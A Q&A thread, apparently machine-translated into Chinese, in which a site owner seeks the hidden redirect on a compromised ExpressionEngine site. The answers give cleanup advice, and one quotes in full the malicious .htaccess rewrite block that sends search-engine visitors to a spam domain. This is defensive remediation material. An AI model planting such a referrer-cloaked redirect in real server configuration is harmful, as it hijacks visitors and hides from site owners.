2011-11-20 33 views
1

我有一個表達式引擎網站,我嘗試清理。該數據庫已被授予許多新用戶,因此似乎數據庫已被黑客入侵/鏈接添加。一個市長的問題是,在谷歌中點擊的網站被繞過。所有訪問者都被重定向到另一個網站。這裏是搜索:http://tinyurl.com/72nzutj。第一個網站是有問題的..他們被重定向到的網站是http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 我一直在嘗試在所有文件和數據庫中找到此重定向,但我沒有運氣。這不是一個.htaccess重定向,我已經檢查和確認。但是,我還沒有能夠找到文件或數據庫中的JScript或PHP重定向到目前爲止。可能是因爲base64或打包加密而隱藏起來的。想法?表達式引擎網站被黑 - 找到重定向

NB沒有可用的清潔數據庫版本

+0

當我點擊該網站的鏈接時,AVG對我發瘋了。重新啓動計算機的時間.. – skyuzo

+0

此問題可能更適合[ServerFault](http://serverfault.com)或[ITSecurity](http://security.stackexchange.com)。無論哪種方式,祝你好運解決這個問題! –

回答

1

重定向發生from a compromise到您網站的.htaccess文件,並且僅影響來自熱門搜索引擎的clickthrus。直接訪問站點無效,並有助於防止惡意軟件被檢測到。

尋找在你的站點的目錄下面的代碼並將其刪除:

<IfModule mod_rewrite.c> 
    RewriteEngine On 
    RewriteOptions inherit 
    RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC] 
    RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L] 
</IfModule> 

您可能需要在您的FTP客戶端查看「隱藏文件」或使用ls -al通過命令行來查看您的.htaccess文件。

你有後的問題固定的,你要確保你運行的是最新的版本ExpressionEngineEE 1.7.1EE 2.3.1在本文寫作),以及任何第三方Add-Ons

審覈您的服務器的access_logs可能有助於識別導致攻擊的漏洞,並查看網站目錄中文件的修改時間戳。

一個variant of this attack已經影響了很多的WordPress安裝,從而微小的Base64編碼的JavaScript片段剛剛閉幕</body>標籤前加入,從而導致遊客被送達的惡意軟件感染的Adobe Flash Player下載。

+0

找到一個這樣的.htaccess重定向。但是對於另一個站點來說就是同一個服考慮爲相關網站找到相同的代碼,但目前還沒有運氣。 – rhand

+0

客戶端正在使用1.6。8所以升級也不錯 – rhand

+0

通過使用較舊的備份或刪除多個shell和垃圾郵件代碼,最終得到修復。感謝您的反饋意見! – rhand

1

問問你的虛擬主機。看起來,帶有除網站以外的其他引薦網站的訪問者已被重定向,但將您的網站(無引薦者)直接粘貼到位置欄中。

這個問題最好在ServerFault或ITSecurity。

+0

也會在服務器故障中添加此問題。我知道這是一個市長問題。但我決心解決它。 – rhand

+0

如何關閉此問題?已將其添加到ServerFault中。 – rhand

+1

只要您有15個信譽點,就可以將其標記爲「脫離主題」並投票將其移至ServerFault。只要足夠多的人這樣做,它就會被遷移。 –